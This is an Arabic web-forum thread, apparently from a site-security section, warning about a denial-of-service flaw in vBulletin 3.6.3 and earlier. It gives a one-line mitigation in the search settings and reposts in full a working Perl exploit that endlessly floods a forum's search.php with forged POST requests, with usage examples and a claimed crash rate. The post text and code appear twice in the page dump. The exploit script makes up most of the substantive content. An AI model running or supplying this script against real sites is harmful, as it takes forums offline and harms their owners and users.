ثغرة قوية تعمل على جميع الإصدارت vBulletin <= 3.6.3 (and POSSIBLY 3.6.4) DoS

18-May-2007, 06:05 PM

بسم الله الرحمن الرحيم

ثغرة في ملف search.php الموجود في المنتدى والثغرة بتعمل فلووود خطير جدا جدا على المنتدى حل الثغرة :
رح إلى لوحة تحكم المنتدى ----> خيارات المنتدى ---> خيارات البحث في المواضيع

هنا بتلقا كل ما يخص محرك البحث في منتداك منها الصوره والمده

كود الإستغلال:
كود:

كود PHP:


			
# VBulletin DoS Exploit by www.h4x0r.ir 

# 

# The exploit was tested on 15 machines And 13 of them got Crashed. 98% Works  

# 

# important => Image Verification in (search.php) is NOT Enabled. 



# It works on 3.6.3 and prior [all] ! 

# 

#Perl Script 

use Socket; 

if (@ARGV < 2) { &usage; } 

$rand=rand(10); 

$host = $ARGV[0]; 

$dir = $ARGV[1]; 

$host =~ s/(http://)//eg; 

for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++) 

{ 

$user="h4x0r".$rand.$i; 

$data = "s=&do=process&query=$user&titleonly=0&starteronly=0&exactname=1&replyless=0&replylimit=3&searchdate=1&beforeafter=before&sortby=title&order=descending&showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now"; 

$len = length $data; 

$foo = "POST ".$dir."search.php HTTP/1.1\r\n". 

"Accept: */*\r\n". 

"Accept-Language: en-gb\r\n". 

"Content-Type: application/x-www-form-urlencoded\r\n". 

"Accept-Encoding: gzip, deflate\r\n". 

"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n". 

"Host: $host\r\n". 

"Content-Length: $len\r\n". 

"Connection: Keep-Alive\r\n". 

"Cache-Control: no-cache\r\n\r\n". 

"$data"; 

my $port = "80"; 

my $proto = getprotobyname('tcp'); 

socket(SOCKET, PF_INET, SOCK_STREAM, $proto); 

connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo; 

send(SOCKET,"$foo", 0); 

syswrite STDOUT, "|" ; 



} 

print "\n\n"; 

system('ping $host'); 

sub usage { 

print "\tusage: \n"; 

print "\t$0 <host> </dir/>\n"; 

print "\tex: $0 127.0.0.1 /forum/\n"; 

print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n\n"; 

print "\th4x0r Security Team\n"; 

print "\twww.h4x0r.ir\n\n"; 









exit(); 

}; 



# Exploit By www.h4x0r.ir

وهذه صورة من الأستغلال وأثرها على المنتديات :

لاحظ الموقع كيف انهار

تحياتي لكم

28-Jan-2008, 04:45 PM

الف شكر اخوي على التنبيه

29-Jan-2008, 12:48 PM

اشكرك على مرورك الكريم

تحياتي

18-May-2007, 06:05 PM	#1 (permalink)
مدير عام تاريخ التسجيل: May 2007 المشاركات: 614	*ثغرة قوية تعمل على جميع الإصدارت vBulletin <= 3.6.3 (and POSSIBLY* 3.6.4) DoS** بسم الله الرحمن الرحيم ثغرة في ملف search.php الموجود في المنتدى والثغرة بتعمل فلووود خطير جدا جدا على المنتدى حل الثغرة : رح إلى لوحة تحكم المنتدى ----> خيارات المنتدى ---> خيارات البحث في المواضيع هنا بتلقا كل ما يخص محرك البحث في منتداك منها الصوره والمده كود الإستغلال: كود: كود PHP: # VBulletin DoS Exploit by www.h4x0r.ir # # The exploit was tested on 15 machines And 13 of them got Crashed. 98% Works # # important => Image Verification in (search.php) is NOT Enabled. # It works on 3.6.3 and prior [all] ! # #Perl Script use Socket; if (@ARGV < 2) { &usage; } $rand=rand(10); $host = $ARGV[0]; $dir = $ARGV[1]; $host =~ s/(http://)//eg; for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++) { $user="h4x0r".$rand.$i; $data = "s=&do=process&query=$user&titleonly=0&starteronly=0&exactname=1&replyless=0&replylimit=3&searchdate=1&beforeafter=before&sortby=title&order=descending&showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now"; $len = length $data; $foo = "POST ".$dir."search.php HTTP/1.1\r\n". "Accept: /\r\n". "Accept-Language: en-gb\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Accept-Encoding: gzip, deflate\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n". "Host: $host\r\n". "Content-Length: $len\r\n". "Connection: Keep-Alive\r\n". "Cache-Control: no-cache\r\n\r\n". "$data"; my $port = "80"; my $proto = getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto); connect(SOCKET, sockaddr_in($port, inet_aton($host))) \|\| redo; send(SOCKET,"$foo", 0); syswrite STDOUT, "\|" ; } print "\n\n"; system('ping $host'); sub usage { print "\tusage: \n"; print "\t$0 <host> </dir/>\n"; print "\tex: $0 127.0.0.1 /forum/\n"; print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n\n"; print "\th4x0r Security Team\n"; print "\twww.h4x0r.ir\n\n"; exit(); }; # Exploit By www.h4x0r.ir وهذه صورة من الأستغلال وأثرها على المنتديات : لاحظ الموقع كيف انهار تحياتي لكم __________________ منتديات شبكة آرا ويب لخدمات الانترنت http://www.arawebserv.com/vb لطلبات الاشراف والمتابعة admin@arawebserv.com

28-Jan-2008, 04:45 PM	#2 (permalink)
المراقبة العامة تاريخ التسجيل: Jan 2008 المشاركات: 50	الف شكر اخوي على التنبيه __________________

29-Jan-2008, 12:48 PM	#3 (permalink)
مدير عام تاريخ التسجيل: May 2007 المشاركات: 614	اشكرك على مرورك الكريم تحياتي __________________ منتديات شبكة آرا ويب لخدمات الانترنت http://www.arawebserv.com/vb لطلبات الاشراف والمتابعة admin@arawebserv.com

أدوات الموضوع
مشاهدة صفحة طباعة الموضوع أرسل هذا الموضوع إلى صديق
طريقة عرض الموضوع
العرض العادي الانتقال إلى العرض المتطور الانتقال إلى العرض الشجري

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر رد
تعلم التصميم الجرافيكي واحترف استخدام جميع برامج التصميم من CBTzone	khaled123	معرض التصاميم وبرامج التصميم	0	18-Jan-2009 09:28 AM
[ روابط ] قوية جدا في عالم Css	araweb	معرض التصاميم وبرامج التصميم	1	10-Mar-2008 11:07 AM
ثغرة قاتلة في GameSiteScript 3 انصح جميع بالترقية او مسحها	هانى الشامى	تطوير المواقع	0	09-Jul-2007 11:02 AM
ثغرة الإحصائيات للمنتديات vBulletin	araweb	حماية المواقع و سد ثغرات المنتديات	0	18-May-2007 06:25 PM
ثغرة في جميع النسخ حتى 3.6.6	araweb	حماية المواقع و سد ثغرات المنتديات	0	18-May-2007 05:11 PM

ثغرة قوية تعمل على جميع الإصدارت vBulletin <= 3.6.3 (and *POSSIBLY* 3.6.4) DoS

حماية مواقع ، حماية منتدى ، سد ثغرات ، حماية ، ثغرات ، ترقيع

ثغرة قوية تعمل على جميع الإصدارت vBulletin <= 3.6.3 (and POSSIBLY 3.6.4) DoS